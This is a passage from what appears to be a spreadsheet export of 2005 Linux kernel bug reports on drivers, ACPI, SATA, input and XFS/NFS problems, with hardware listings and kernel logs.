    <t>With this (rather old) magneto-optical drive: hdd: FUJITSU MCC3064AP, ATAPI OPTICAL drive /proc/ide/hdd/media does not show the expected value: # cat /proc/ide/hdd/media UNKNOWN I think that the ide_optical device type should be displayed as "optical" in /proc/ide/*/media. BTW, the device type information does not seem to be available in sysfs - only in /proc/ide.</t>
  </si>
  <si>
    <t>recent input changes create console spam</t>
  </si>
  <si>
    <t>2.6.11-rc2-bk10</t>
  </si>
  <si>
    <t>2005-02-02 09:43 UTC</t>
  </si>
  <si>
    <t>2007-05-10 10:29 UTC</t>
  </si>
  <si>
    <t>Distribution: fedora core development. Hardware Environment: usb mouse and keyboard on a thinkpad x31 and also an Apple macintosh G4. Software Environment: 2.6.11-rc2-bk10 and also 2.6.10-1.1121_FC4 Problem Description: For every key stroke, I get one of these printed across my console: drivers/usb/input/hid-input.c: event field not found Steps to reproduce: Boot affected kernel, wait for initial console, type away, and enjoy the spammy goodness. Also filed in Red Hat bugzilla against Fedora development: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=146906 I've complained about the input subsystem spamming the console before with the too many keys pressed error, but this is ridiculous! Feb 2 12:22:06 razor kernel: drivers/usb/input/hid-input.c: event field not found Feb 2 12:22:37 razor last message repeated 1682 times Feb 2 12:23:38 razor last message repeated 3382 times Feb 2 12:24:39 razor last message repeated 3930 times Feb 2 12:25:43 razor last message repeated 1028 times Feb 2 12:26:44 razor last message repeated 1327 times Feb 2 12:27:45 razor last message repeated 1942 times Feb 2 12:28:46 razor last message repeated 1771 times Feb 2 12:29:47 razor last message repeated 1269 times Feb 2 12:30:48 razor last message repeated 900 times Feb 2 12:31:49 razor last message repeated 1495 times Feb 2 12:32:50 razor last message repeated 1847 times Feb 2 12:33:51 razor last message repeated 2252 times Feb 2 12:34:52 razor last message repeated 1512 times Feb 2 12:35:53 razor last message repeated 1199 times Feb 2 12:36:58 razor last message repeated 1182 times Feb 2 12:37:59 razor last message repeated 2024 times Feb 2 12:39:00 razor last message repeated 807 times Feb 2 12:40:02 razor last message repeated 1249 times Feb 2 12:41:03 razor last message repeated 772 times Feb 2 12:41:10 razor last message repeated 430 times Feb 2 12:41:10 razor su(pam_unix)[3856]: session opened for user root by mgalgoci(uid=0) Feb 2 12:41:11 razor kernel: drivers/usb/input/hid-input.c: event field not found Feb 2 12:41:42 razor last message repeated 1131 times</t>
  </si>
  <si>
    <t>pc speaker recognized like a keyboard</t>
  </si>
  <si>
    <t>2.6.10-1mdk</t>
  </si>
  <si>
    <t>2005-02-03 11:34 UTC</t>
  </si>
  <si>
    <t>neoclust</t>
  </si>
  <si>
    <t>2007-02-19 12:03 UTC</t>
  </si>
  <si>
    <t>Hi, Distribution: Mandrakelinux Problem Description: i have a pc speaker which is recognisez like a keyboard $ cat /proc/bus/input/devices I: Bus=0011 Vendor=0001 Product=0001 Version=ab41 N: Name="AT Translated Set 2 keyboard" P: Phys=isa0060/serio0/input0 H: Handlers=kbd event0 B: EV=120013 B: KEY=4 2000000 2b803878 f840d001 f2ffffdf ffefffff ffffffff fffffffe B: MSC=10 B: LED=7 I: Bus=0010 Vendor=001f Product=0001 Version=0100 N: Name="PC Speaker" P: Phys=isa0061/input0 H: Handlers=kbd event1 B: EV=40001 B: SND=6 I: Bus=0005 Vendor=045e Product=007b Version=0039 N: Name="" P: Phys= H: Handlers=kbd event2 B: EV=120003 B: KEY=7 ff87207a c14057ff febeffdf ffefffff ffffffff fffffffe B: LED=1f I: Bus=0005 Vendor=045e Product=007c Version=0033 N: Name="" P: Phys= H: Handlers=mouse0 event3 ts0 B: EV=7 B: KEY=1f0000 0 0 0 0 0 0 0 0 B: REL=103 Do you need more informations ?</t>
  </si>
  <si>
    <t>Dell hardware signature not recognised by i8k module</t>
  </si>
  <si>
    <t>2005-02-03 12:14 UTC</t>
  </si>
  <si>
    <t>treeve</t>
  </si>
  <si>
    <t>2006-01-04 23:03 UTC</t>
  </si>
  <si>
    <t>Distribution: Sourcemage Hardware Environment: Dell Inspiron 510m Software Environment: Problem Description: i8k: not running on a Dell system i8k: vendor=Dell Inc., model=Inspiron 510m, version=A07 i8k: unable to get SMM Dell signature i8k: unable to get SMM BIOS version It appears that Dell have changed their name in the signature string, so the i8k module does not recognise the hardware. lshw reports the following: nspiron description: Portable Computer product: Inspiron 510m vendor: Dell Inc. serial: 5MN591J capabilities: smbios-2.3 dmi-2.3 configuration: boot=normal chassis=portable uuid=44454C4C-4D00-104E-8035-B5C04F393 14A *-core description: Motherboard product: 0H1908 vendor: Dell Inc. physical id: 0 serial: .5MN591J.CN486434970443. *-firmware description: BIOS vendor: Dell Inc. physical id: 0 version: A07 (09/09/2004) size: 64KB capacity: 448KB capabilities: isa pci pcmcia pnp apm upgrade shadowing cdboot bootselect int 13floppy720 int5printscreen int9keyboard int14serial int17printer int10video acpi usb agp smartbattery biosbootspecification netboot Steps to reproduce:</t>
  </si>
  <si>
    <t>HPT3xx (370A) DMA issues and the HighPoint open source(?) driver</t>
  </si>
  <si>
    <t>2005-02-04 06:40 UTC</t>
  </si>
  <si>
    <t>2009-02-17 18:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian/sid Hardware Environment: i386 (K7), VIA KT400 chipset, HPT370A soft"raid" crap Software Environment: nothing special Problem Description: The HPT370 driver have a long-long-long standing problem with DMA, it has been buggy under 2.4.xx and it's still dead fish under 2.6.10. The effect is that after a short while I get dma timeouts, lost interrupts and other ugly things, which basically renders the interface dead and the module stuck. Reboot helps (I didn't try to force remove it). Switching off DMA (before the errors) usually solves the problem and the same time generates at least 90% CPU load. Problem is present with one master, or master+slave or any other possible combinations on the 2 channels. http://www.highpoint-tech.com/USA/bios_hpt370_370a.htm contains a linux driver source which seem to work, no DMA problems. I do not know whether anyone checked it (not found on lkml.org achive), whether it's proper open source or not, but I wanted to tell that it works and comes with sources, and the kernel one seems not to like this particular controller. Or maybe a user error, but I tried to check it well before submitting. As far as I am able to...</t>
  </si>
  <si>
    <t>2.6.11-rc3</t>
  </si>
  <si>
    <t>sr_vendor.c  compile errors with byteorder includes</t>
  </si>
  <si>
    <t>2005-02-08 07:58 UTC</t>
  </si>
  <si>
    <t>Bill Crowell</t>
  </si>
  <si>
    <t>2005-07-05 12:06 UTC</t>
  </si>
  <si>
    <t>Distribution:Slack Hardware Environment:i386 Software Environment:sr_vendor.c Problem Description: CC drivers/scsi/sr_vendor.o In file included from include/linux/byteorder/little_endian.h:82, from include/asm/byteorder.h:57, from include/linux/cdrom.h:14, from drivers/scsi/sr_vendor.c:38: include/linux/byteorder/generic.h:150: warning: parameter names (without types) in function declaration include/linux/byteorder/generic.h:151: error: parse error before "htonl" include/linux/byteorder/generic.h:151: warning: type defaults to `int' in declaration of `htonl' include/linux/byteorder/generic.h:151: warning: data definition has no type or storage class include/linux/byteorder/generic.h:152: warning: parameter names (without types) in function declaration include/linux/byteorder/generic.h:153: error: parse error before "htons" include/linux/byteorder/generic.h:153: warning: type defaults to `int' in declaration of `htons' include/linux/byteorder/generic.h:153: warning: data definition has no type or storage class make[2]: *** [drivers/scsi/sr_vendor.o] Error 1 make[1]: *** [drivers/scsi] Error 2 Steps to reproduce: make the kernel</t>
  </si>
  <si>
    <t>(wireless airo) Aironet 340 PCMCIA does not support WPA</t>
  </si>
  <si>
    <t>network-wireless</t>
  </si>
  <si>
    <t>2005-02-09 11:47 UTC</t>
  </si>
  <si>
    <t>2008-09-22 12:05 UTC</t>
  </si>
  <si>
    <t>John W. Linville</t>
  </si>
  <si>
    <t>Distribution: Debian unstable Hardware Environment: Dell Inspiron 3800 + Aironet 340 PCMCIA Software Environment: wpa_supplicant Problem Description: The aironet driver does not seem to suport WPA. Since WEP has been broken WPA becomes a de facto standard, thus the driver is becoming more and more useless. Steps to reproduce: Use a Aironet 340 and try to use wpa_supplicant</t>
  </si>
  <si>
    <t>Adds time suspended to system clock</t>
  </si>
  <si>
    <t>2005-02-09 20:50 UTC</t>
  </si>
  <si>
    <t>russell bell</t>
  </si>
  <si>
    <t>2005-02-16 11:22 UTC</t>
  </si>
  <si>
    <t>Distribution: slackware Hardware Environment: thinkpad 390x Software Environment: linux 2.6.10 Problem Description: On resumption the system clock has the time advanced by the amount of time suspended beyond the true time. Steps to reproduce: suspend then resume I can fix the problem by changing arch/i386/kernel/time.c, line 346 from: sleep_length = get_cmos_time() - sleep_start; to sleep_length = 0;</t>
  </si>
  <si>
    <t>(sata sis) doesnt support sis965L</t>
  </si>
  <si>
    <t>all 2.6 series upto 2.6.12</t>
  </si>
  <si>
    <t>2005-02-10 02:01 UTC</t>
  </si>
  <si>
    <t>Rituraj</t>
  </si>
  <si>
    <t>2006-04-22 10:19 UTC</t>
  </si>
  <si>
    <t>Distribution:Any(tried Gentoo/Debian/Fedora/Ubuntu with latest kernels) Hardware Environment:Sis motherboard K8S MX, AMD64(2800+), SATA HDD Software Environment:GNU/Linux kernels 2.6.8 &amp; 2.6.9 Problem Description: I have a AMD64 +asus k8s mx motherboard(SIS chipset 760GX &amp; sis 965L) + samsung 80GB sata. I am not able to install GNU/Linux on my system as Linux does not detect my sata drive. I have tried debian, gentoo , slackware, ubuntu, fedora, mepis(all above 2.6.8 kernels) etc. without success. All the above mentined distros do not have sata module built into installer so i did ALT+F2 modprobe sata_sis. It loads libata and sata_sis but i do not see any hdd drives under /proc/scsi/scsi.Neither is the drive listed in /dev/hd* or /dev/sd* lspci -n shows sata as 0000:00:05 Unknown device 0182. Windows XP 64 bit works well on this system so there is no hardware problem. There are no drivers available from asus or sis for linux. Sata_sis module upto 2.6.10 currently supports sis964 but mine is sis965L. I have done a lot of googling and found only open ended questions without any solution. Some answers on google suggest a workaround to do install on IDE hdd and then rebuild the kernel to include sata support and then boot that kernel from SATA drive ---this seems to be a bit time consuming and i dont have a IDE drive currently. Also if there is no sis965L support there is no use of this workaround to use IDE. Please let me know if there is any other solution or/and if someone has info that the future kernels will support this chipset. Additional info: i have even inserted all sata* scsi* raid* modules(even sd_mod). Also did noapic noprob at bootup. I am really keen to run GNU/Linux on my pc as i have bought it to use blender3D with high redering speed of 64 bit AMD. Thank you in anticipation. Regards; Rituraj Steps to reproduce: Installing GNU/Linux any distro doesnt detect media for partitioning.</t>
  </si>
  <si>
    <t>FORCE_APIC_PHYSICAL_DESTINATION_MODE</t>
  </si>
  <si>
    <t>2005-02-10 11:57 UTC</t>
  </si>
  <si>
    <t>Jason Davis</t>
  </si>
  <si>
    <t>2005-07-12 13:40 UTC</t>
  </si>
  <si>
    <t>Distribution: any which uses 2.6.10 Hardware Environment: ES7000 Servers Software Environment: System initialization Problem Description: The current x86_64 genapic driver only enables the apic_cluster driver depending on the number of clusters counted. The 4 most significant bits of the APICID determine a cluster #. For the install case, the current x86_64 genapic algorithm will only recognize one CPU (hence one cluster) and will default to the apic_flat driver, which uses logical APIC mode for interrupt delivery destination. This solution is not satisfactory for systems, like Unisys</t>
  </si>
  <si>
    <t>Incomplete core files when size is &gt; 2GB</t>
  </si>
  <si>
    <t>2005-02-10 13:09 UTC</t>
  </si>
  <si>
    <t>Dave Putz</t>
  </si>
  <si>
    <t>2005-08-07 14:49 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: 32-bit only Software Environment: Problem Description: core files which are &gt; 2GB in size will be missing segments which would start at addresses &gt; 2GB in the core file. The problem is in the parameters to dump_seek in fs/binfmt_elf.c. "static int dump_seek(struct file *file, off_t off)" should be "static int dump_seek(struct file *file, loff_t off)" Steps to reproduce: create an app that uses &gt; 2GB of memory (such as a large shared memory area) and has lots of shared libraries to create segements above the large memory space. A core file will have the correct header info, but will be incomplete when the seek (called by the macro DUMP_SEEK in elf_core_dump()) fails. Setting the type of the second parameter to dump_seek correctly to loff_t fixes the problem.</t>
  </si>
  <si>
    <t>[patch] saa7134 - more reliable carrier detection</t>
  </si>
  <si>
    <t>2.6.11-rc3-mm2 (bug 4171 patched)</t>
  </si>
  <si>
    <t>2005-02-11 05:19 UTC</t>
  </si>
  <si>
    <t>Jindrich Makovicka</t>
  </si>
  <si>
    <t>2006-11-14 06:51 UTC</t>
  </si>
  <si>
    <t>This patch makes the SAA7134 driver do a series of attempts to detect the audio carrier instead of just one, and also relaxes the detection criteria a bit during the later attempts. For me, it substantially improves the scan reliability. With the unpatched driver, TV outputs white noise every now and then, while with the patch the tuning works correctly. Such unreliability is especially annoying when capturing some video using cron, as one has to worry that the result will contain just noise instead of proper sound track.</t>
  </si>
  <si>
    <t>snd-cs4243 contains no pnp ids for Netfinity 3000</t>
  </si>
  <si>
    <t>2.6.11-rc4</t>
  </si>
  <si>
    <t>2005-02-15 00:47 UTC</t>
  </si>
  <si>
    <t>Lukasz Stelmach</t>
  </si>
  <si>
    <t>2006-02-03 13:36 UTC</t>
  </si>
  <si>
    <t>Distribution: Hardware Environment: Netfinity 3000 (Pentium II, 450MHz) Problem Description: Built in sound card is not detected by pnp procedures due to lack of proper ids on the list. Steps to reproduce: Get one Netfinity 3000 (Machine type: 8476, model: 40X). Try to load snd-cs4243 module.</t>
  </si>
  <si>
    <t>radeonfb makes system hang and LCD "burn"</t>
  </si>
  <si>
    <t>2005-02-15 12:03 UTC</t>
  </si>
  <si>
    <t>Marc Poulhi</t>
  </si>
  <si>
    <t>2005-08-31 01:04 UTC</t>
  </si>
  <si>
    <t>Distribution: debian sid Hardware Environment:i686, Radeon Mobility M7 LW [Radeon Mobility 7500] Software Environment: Problem Description: When radeonfb gets loaded, system hangs and LCD display (this is a laptop) "burns" (seems classic when noone handles the display). Steps to reproduce: Starts in single user, then "modprobe radeonfb" I tried to get some debug information by compiling the debug support, but I can't get kernel message to another computer (I tried with netcat). This seems to cause some problem with DRI also. I boot without radeonfb, X starts, then a switch to console has the same effect (freeze + "burn") (same with -rc4)</t>
  </si>
  <si>
    <t>pcnet32 fiberoptic do not works on Allied Telesyn 2701FTX</t>
  </si>
  <si>
    <t>2005-02-16 08:34 UTC</t>
  </si>
  <si>
    <t>Dmitry Sanarin</t>
  </si>
  <si>
    <t>2006-06-19 08:30 UTC</t>
  </si>
  <si>
    <t>Problem Description: We have an Allied Telesyn 2701 FTX network cards. These cards has 2 interfaces: a Fiberoptic 100 Mbit and a TP 10/100Mbit interface. These cards are based on AMD PCnet-PRO (AM79C976) chip. We coonnected two such cards using fiberoptic cables so diode on the cards indicates 100Mbit link. But Linux can't detect this. It allways says "link is down". However, network works, but speed is very low, about 1 Mbit.</t>
  </si>
  <si>
    <t>Error evaluating _BST when trying to read battery status on Asus W3400N</t>
  </si>
  <si>
    <t>2005-02-17 05:48 UTC</t>
  </si>
  <si>
    <t>Lutz Vieweg</t>
  </si>
  <si>
    <t>2007-03-07 22:42 UTC</t>
  </si>
  <si>
    <t>Distribution: Fedora Core 3 (with plain vanilla 2.6.10 kernel) Hardware Environment: Asus W3479NLP (aka W3400N aka W3000N aka W3N) Software Environment: cat /proc/acpi/battery/BAT0/state Problem Description: The status of the battery is unreadable on Asus W3400N series laptops. The Steps to reproduce: Type cat /proc/acpi/battery/BAT0/state returns nothing, the following is emitted to /var/log/messages: kernel: dswstate-0277 [83] ds_result_pop_from_bot: No result objects! State=f7c8a428 kernel: dsutils-0547 [83] ds_create_operand : Missing or null operand, \ AE_AML_NO_RETURN_VALUE kernel: dsutils-0640 [82] ds_create_operands : While creating Arg 2 - \ AE_AML_NO_RETURN_VALUE kernel: psparse-1138: *** Error: Method execution failed [\_SB_.BAT0._BST] (Node \ f7f8b328), AE_AML_NO_RETURN_VALUE kernel: acpi_battery-0208 [73] acpi_battery_get_statu: Error evaluating _BST (Other ACPI features like temperature reading or LED enabling work fine)</t>
  </si>
  <si>
    <t>CardBus bridge: Texas Instruments PCI1410 no IRQ</t>
  </si>
  <si>
    <t>2.6.10-mm* 2.6.11-rc*</t>
  </si>
  <si>
    <t>2005-02-18 08:20 UTC</t>
  </si>
  <si>
    <t>Ryan Hope</t>
  </si>
  <si>
    <t>2005-02-27 03:41 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: 0000:00:00.0 Host bridge: Intel Corp. 82845 845 (Brookdale) Chipset Host Bridge (rev 04) 0000:00:01.0 PCI bridge: Intel Corp. 82845 845 (Brookdale) Chipset AGP Bridge (rev 04) 0000:00:1d.0 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #1) (rev 02) 0000:00:1d.1 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #2) (rev 02) 0000:00:1d.2 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #3) (rev 02) 0000:00:1e.0 PCI bridge: Intel Corp. 82801 Mobile PCI Bridge (rev 42) 0000:00:1f.0 ISA bridge: Intel Corp. 82801CAM ISA Bridge (LPC) (rev 02) 0000:00:1f.1 IDE interface: Intel Corp. 82801CAM IDE U100 (rev 02) 0000:00:1f.5 Multimedia audio controller: Intel Corp. 82801CA/CAM AC'97 Audio Controller (rev 02) 0000:00:1f.6 Modem: Intel Corp. 82801CA/CAM AC'97 Modem Controller (rev 02) 0000:01:00.0 VGA compatible controller: nVidia Corporation NV17 [GeForce4 440 Go] (rev a3) 0000:02:07.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 0000:02:08.0 Ethernet controller: Intel Corp. 82801CAM (ICH3) PRO/100 VE (LOM) Ethernet Controller (rev 42) 0000:02:0a.0 CardBus bridge: Texas Instruments PCI1410 PC card Cardbus Controller (rev 01) 0000:02:0b.0 CardBus bridge: Toshiba America Info Systems ToPIC100 PCI to Cardbus Bridge with ZV Support (rev 32) 0000:02:0b.1 CardBus bridge: Toshiba America Info Systems ToPIC100 PCI to Cardbus Bridge with ZV Support (rev 32) 0000:02:0c.0 System peripheral: Toshiba America Info Systems TC6371AF SmartMedia Controller (rev 03) 0000:02:0d.0 System peripheral: Toshiba America Info Systems SD TypA Controller (rev 03) Problem Description: My yenta based card bus does not get an IRQ from a fresh boot. If I run 'setpci -s 0a.0 0x80.l=0x0844b060' then reboot, the card gets an IRQ. This goes away if I power off the computer. I have a Toshiba Sattelite 5105-S901</t>
  </si>
  <si>
    <t>some devices still fail to do PPR</t>
  </si>
  <si>
    <t>2005-02-18 12:13 UTC</t>
  </si>
  <si>
    <t>2006-04-20 05:23 UTC</t>
  </si>
  <si>
    <t>This was an exchange on linux-scsi; I'm filing it here to keep track of it. ----- FWIW... I just upgraded from 2.4.9 to 2.6.10. 2.6.10 kept printing phase change 6-7 messages. I patched to sym53c8xx_2 2.1.18n, but that didn't help. So I modified scsi_scan.c and sym_hipd.c sym_prepare_nego to never try PPR. That made the messages go away. 00:0a.0 SCSI storage controller: Symbios Logic Inc. (formerly NCR) 53c1010 +Ultra3 SCSI Adapter (rev 01) (on a tekram dc390u3w) Vendor: SEAGATE Model: SX150176LC Rev: BA08 Type: Direct-Access ANSI SCSI revision: 02 (=st150176lc, fast-40, lvd) It sounds like PPR only does anything for fast-80 and above drives so I guess I'm OK now. -- uns ----- Let me get this straight. This drive is on an LVD bus, capable of FAST-40, reports being capable of PPR in its mode page and *still* fucks up when asked to do PPR? Googling for SX150176LC shows me several people with later revision firmware (BA09, BA0F, BA11, BA12), so maybe you can get a firmware upgrade out of Seagate. I'm a little disappointed that 2.1.18n didn't fix it though. Could you revert your local changes, boot with "sym53c8xx.debug=0x200" and send me the results? ----- &gt; Let me get this straight. This drive is on an LVD bus, I think so. It must be, to negotiate faster than 10 megatransfers, I guess? &gt; capable of FAST-40, Yes: sym0:2: FAST-40 WIDE SCSI 80.0 MB/s ST (25.0 ns, offset 15) when PPR is disabled. &gt; reports being capable of PPR in its mode page Not sure. Can scsiinfo or something report that? BTW it reports ANSI SCSI revision 02, I don't know if that's SCSI-2 or SCSI-3.</t>
  </si>
  <si>
    <t>Enable C-state even when only C1 is present</t>
  </si>
  <si>
    <t>2.6.11-rc</t>
  </si>
  <si>
    <t>2005-02-20 16:16 UTC</t>
  </si>
  <si>
    <t>2005-07-27 18:54 UTC</t>
  </si>
  <si>
    <t>Currently, /proc/acpi/processor/CPU*/power will not show C-state statistics when only C1 is supported. The patch will enable the /proc/ Cstate interfaces even when only C1 is supported. This should not add any performance overhead due to acpi_idle routine, as we don't have anything to do at the time of running idle routine. Further, as Dominik pointed out, there can be a case where only C1 is enabled in AC power and other C-states get enabled when on battery. The patch here will help that case as well.</t>
  </si>
  <si>
    <t>Kernel Panic 2.6.5 FC2 smp amd 64</t>
  </si>
  <si>
    <t>2.6.5-1.358smp</t>
  </si>
  <si>
    <t>2005-02-24 11:26 UTC</t>
  </si>
  <si>
    <t>Charles Wright</t>
  </si>
  <si>
    <t>2006-01-04 23:05 UTC</t>
  </si>
  <si>
    <t>Distribution: FC2 Hardware Environment: SMP amd 64 Software Environment: FC2 w 3ware raid xfs nfs server Problem Description: Box was crashing consistanty before updated to 2.6.10 Would like to know if I was hitting a known issue Feb 21 16:45:37 nfs kernel: xfs_iget_core: ambiguous vns: vp/0x000001005cb2dcc0, invp/0x000001004628ca80 Feb 21 16:45:37 nfs kernel: ----------- [cut here ] --------- [please bite here ] --------- Feb 21 16:45:37 nfs kernel: Kernel BUG at debug:106 Feb 21 16:45:37 nfs kernel: invalid operand: 0000 [1] SMP Feb 21 16:45:37 nfs kernel: CPU 1 Feb 21 16:45:37 nfs kernel: Pid: 2098, comm: nfsd Not tainted 2.6.5-1.358smp Feb 21 16:45:37 nfs kernel: RIP: 0010:[&lt;ffffffffa00e6506&gt;] &lt;ffffffffa00e6506&gt;{:xfs:cmn_err+273} Feb 21 16:45:37 nfs kernel: RSP: 0018:000001007d049758 EFLAGS: 00010246 Feb 21 16:45:37 nfs kernel: RAX: 0000000000000050 RBX: 0000000000000000 RCX: ffffffff803b6488 Feb 21 16:45:37 nfs kernel: RDX: 000001003eb4d738 RSI: 000001007d876c80 RDI: 000001003eb4d700 Feb 21 16:45:37 nfs kernel: RBP: 000001007ec0e698 R08: 0000000000000001 R09: 000000000000000d Feb 21 16:45:37 nfs kernel: R10: 0000000000000000 R11: 00000001803b6480 R12: 000000008000121e Feb 21 16:45:37 nfs kernel: R13: 0000000000000008 R14: 000000008000121e R15: 000001004628ca80 Feb 21 16:45:37 nfs kernel: FS: 0000002a958624c0(0000) GS:ffffffff80481f00(0000) knlGS:0000000055562bc0 Feb 21 16:45:37 nfs kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b Feb 21 16:45:37 nfs kernel: CR2: 0000003926a8c5d0 CR3: 000000007ff9c000 CR4: 00000000000006e0 Feb 21 16:45:37 nfs kernel: Process nfsd (pid: 2098, stackpage=1007d044480) Feb 21 16:45:37 nfs kernel: Stack: 000001007cf2cd00 0000000000000293 0000003000000020 000001007d049848 Feb 21 16:45:37 nfs kernel: 000001007d049788 000001007d043798 0000000000000000 000001007ec0e698 Feb 21 16:45:37 nfs kernel: 000001005cb2dcc0 000001004628ca80 Feb 21 16:45:37 nfs kernel: Call Trace:&lt;ffffffff8013b73e&gt;{del_timer_sync+32} &lt;ffffffff802d2afc&gt;{schedule_timeout+174} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa00e4e7d&gt;{:xfs:xfs_initialize_vnode+78} &lt;ffffffff8012ef0c&gt;{recalc_task_prio+343} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa00c0a5c&gt;{:xfs:xfs_iget_core+267} &lt;ffffffffa00c0ed3&gt;{:xfs:xfs_iget+145} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa00d7bb5&gt;{:xfs:xfs_vget+51} &lt;ffffffffa019edc0&gt;{:nfsd:nfsd_acceptable+0} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa00e5abe&gt;{:xfs:vfs_vget+34} &lt;ffffffffa00e5677&gt;{:xfs:linvfs_get_dentry+59} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa019a048&gt;{:exportfs:find_exported_dentry+72} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa019edc0&gt;{:nfsd:nfsd_acceptable+0} &lt;ffffffff8027592b&gt;{alloc_skb+64} Feb 21 16:45:37 nfs kernel: &lt;ffffffff80274f58&gt;{sock_alloc_send_pskb+111} &lt;ffffffff80294ed2&gt;{ip_append_data+738} Feb 21 16:45:37 nfs kernel: &lt;ffffffff80294b64&gt;{ip_generic_getfrag+0} &lt;ffffffff802b0eed&gt;{udp_sendmsg+1382} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa01a3df6&gt;{:nfsd:exp_find_key+118} &lt;ffffffffa019a847&gt;{:exportfs:export_decode_fh+73} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa019f27d&gt;{:nfsd:fh_verify+957} &lt;ffffffff80279e82&gt;{dev_queue_xmit+240} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa01a06e6&gt;{:nfsd:nfsd_open+34} &lt;ffffffffa01a0cf0&gt;{:nfsd:nfsd_write+69} Feb 21 16:45:37 nfs kernel: &lt;ffffffff801ca35d&gt;{csum_partial_copy_nocheck+13} &lt;ffffffff80276e57&gt;{skb_copy_and_csum_bits+91} Feb 21 16:45:37 nfs kernel: &lt;ffffffff80275a5f&gt;{skb_release_data+42} &lt;ffffffffa0150765&gt;{:sunrpc:ip_map_lookup+280} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa0150ed6&gt;{:sunrpc:svcauth_unix_accept+558} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa01a7361&gt;{:nfsd:nfsd3_proc_write+240} &lt;ffffffffa019d713&gt;{:nfsd:nfsd_dispatch+226} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa014d446&gt;{:sunrpc:svc_process+931} &lt;ffffffffa019d25f&gt;{:nfsd:nfsd+0} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa019d490&gt;{:nfsd:nfsd+561} &lt;ffffffff80111ce7&gt;{child_rip+8} Feb 21 16:45:37 nfs kernel: &lt;ffffffffa019d25f&gt;{:nfsd:nfsd+0} &lt;ffffffffa019d25f&gt;{:nfsd:nfsd+0} Feb 21 16:45:37 nfs kernel: &lt;ffffffff80111cdf&gt;{child_rip+0} Feb 21 16:45:37 nfs kernel: Feb 21 16:45:37 nfs kernel: Code: 0f 0b 40 b7 0e a0 ff ff ff ff 6a 00 48 81 c4 e0 00 00 00 5b Feb 21 16:45:37 nfs kernel: RIP &lt;ffffffffa00e6506&gt;{:xfs:cmn_err+273} RSP &lt;000001007d049758&gt;</t>
  </si>
  <si>
    <t>KERNEL: assertion (!atomic_read(&amp;sk-&gt;sk_rmem_alloc)) failed at net/netlink/af_netlink.c (122)</t>
  </si>
  <si>
    <t>2005-02-24 16:15 UTC</t>
  </si>
  <si>
    <t>Krzysztof Oledzki</t>
  </si>
  <si>
    <t>2005-10-01 12:51 UTC</t>
  </si>
  <si>
    <t>Distribution: Slackware 10 Hardware Environment: # cat /proc/cpuinfo processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 3 model name : Intel(R) Pentium(R) 4 CPU 2.80GHz stepping : 4 cpu MHz : 2793.832 cache size : 1024 KB physical id : 0 siblings : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe pni monitor ds_cpl cid xtpr bogomips : 5505.02 processor : 1 vendor_id : GenuineIntel cpu family : 15 model : 3 model name : Intel(R) Pentium(R) 4 CPU 2.80GHz stepping : 4 cpu MHz : 2793.832 cache size : 1024 KB physical id : 0 siblings : 2 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe pni monitor ds_cpl cid xtpr bogomips : 5570.56 # lspci 00:00.0 Host bridge: Intel Corp. E7220/E7221 Memory Controller Hub (rev 05) 00:01.0 PCI bridge: Intel Corp. E7220/E7221 PCI Express Root Port (rev 05) 00:02.0 VGA compatible controller: Intel Corp. E7221 Integrated Graphics Controller (rev 05) 00:1c.0 PCI bridge: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03) 00:1c.2 PCI bridge: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 3 (rev 03) 00:1c.3 PCI bridge: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 4 (rev 03) 00:1d.0 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03) 00:1d.1 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 03) 00:1d.2 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 03) 00:1d.3 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 03) 00:1d.7 USB Controller: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 03) 00:1e.0 PCI bridge: Intel Corp. 82801 PCI Bridge (rev d3) 00:1f.0 ISA bridge: Intel Corp. 82801FB/FR (ICH6/ICH6R) LPC Interface Bridge (rev 03) 00:1f.1 IDE interface: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller (rev 03) 00:1f.2 Class 0106: Intel Corp. 82801FR/FRW (ICH6R/ICH6RW) SATA Controller (rev 03) 00:1f.3 SMBus: Intel Corp. 82801FB/FBM/FR/FW/FRW (ICH6 Family) SMBus Controller (rev 03) 